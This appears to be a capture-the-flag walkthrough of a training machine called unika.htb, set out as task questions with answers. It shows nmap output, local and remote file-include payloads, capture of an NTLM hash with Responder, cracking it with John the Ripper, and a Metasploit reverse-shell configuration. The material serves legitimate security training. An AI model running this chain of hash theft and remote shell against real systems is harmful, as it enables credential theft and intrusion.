sudo nmap -p- --min-rate 5000 -sV -v 10.129.169.214
Starting Nmap 7.80 ( https://nmap.org ) at 2022-09-08 06:28 EDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 06:28
Scanning 10.129.169.214 [4 ports]
Completed Ping Scan at 06:28, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:28
Scanning unika.htb (10.129.169.214) [65535 ports]
Discovered open port 80/tcp on 10.129.169.214
Discovered open port 7680/tcp on 10.129.169.214
Discovered open port 5985/tcp on 10.129.169.214
Completed SYN Stealth Scan at 06:28, 27.06s elapsed (65535 total ports)
Initiating Service scan at 06:28
Scanning 3 services on unika.htb (10.129.169.214)
Completed Service scan at 06:29, 45.92s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.169.214.
Initiating NSE at 06:29
Completed NSE at 06:29, 0.73s elapsed
Initiating NSE at 06:29
Completed NSE at 06:29, 0.47s elapsed
Nmap scan report for unika.htb (10.129.169.214)
Host is up (0.14s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp open pando-pub?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.69 seconds
Raw packets sent: 131089 (5.768MB) | Rcvd: 18 (776B)
Task 1
When visiting the web service using the IP address, what is the domain that we are being redirected to?
Found by going to the IP and looking at the URL.
Answer: unika.htb
Task 2
Which scripting language is being used on the server to generate webpages?
Had to add the IP to the website name in my hosts file.
echo "10.129.95.234 unika.htb" | sudo tee -a /etc/hostsh
Found by: browsing the site and changing the language on the site to French or German
We see the URL is http://unika.htb/index.php?page=german.html, showing this is written in PHP.
Answer: PHP
Task 3
What is the name of the URL parameter which is used to load different language versions of the webpage?
Again, looking at the URL, we can see the query as page=
Answer: Page
Task 4
Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Found by the answer being as long as that value, but as well as googling 'exploiting PHP LFI' will give us various articles with this explaining how, and other examples.
Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Again, found by the answer being as long as the value, but also googling 'Exploiting php RFI' gives more articles and explaining how, and other exampls.
Answer: //10.10.14.6/somefile
Task 6
What does NTLM stand for?
Found by Google
Answer: New Technology LAN Manager
Task 7
Which flag do we use in the Responder utility to specify the network interface?
After simply running ./responder.py, we are given:
sudo ./Responder.py
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
Error: -I <if> mandatory option is missing
Answer: -I
Task 8
There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?
Found by general knowledge on popular password cracking tools.
Answer: John The Ripper
Task 9
What is the password for the administrator user?
First we run responder to capture the hash.
sudo ./Responder.py -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
...
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.38]
Responder IPv6 [dead:beef:2::1024]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-3UXOOA4MNN1]
Responder Domain Name [I5PS.LOCAL]
Responder DCE-RPC Port [45988]
[+] Listening for events...
After going to the URL: http://unika.htb/?page=//10.10.14.38/randomfile we can look back at responder and see the hash.
sudo ./john -w=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt ~/hash.txt
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2022-09-08 06:18) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Answer: badminton
Task 10
We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
Found within the initial scan
Answer: 5985
Task 11
Submit root flag
This part I did have to look around online as I was unable to get evil-winrm to work for me. but also could be having to restart the victim box and/or the VPN connection. But it SHOULD be:
Using Evil-WinRM, we will get a shell into the machine and find the file under the users desktop.
or using metasploit, we can use exploit(windows/winrm/winrm_script_exec and set the options for our machine, the target machine, the username and password
Module options (exploit/windows/winrm/winrm_script_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
FORCE_VBS false yes Force the module to use the VBS CmdStager
PASSWORD badminton yes A specific password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:po
rt][...]
RHOSTS 10.129.227.102 yes The target host(s), see https://github.com/rapid7/me
tasploit-framework/wiki/Using-Metasploit
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randoml
y generated)
URI /wsman yes The URI of the WinRM service
URIPATH no The URI to use for this exploit (default is random)
USERNAME Administrator yes A specific username to authenticate as
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, n
one)
LHOST 10.10.14.38 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
Once we get our shell on the machine, we can find the flag under C:\Users\mike\Desktop\flag.txt.
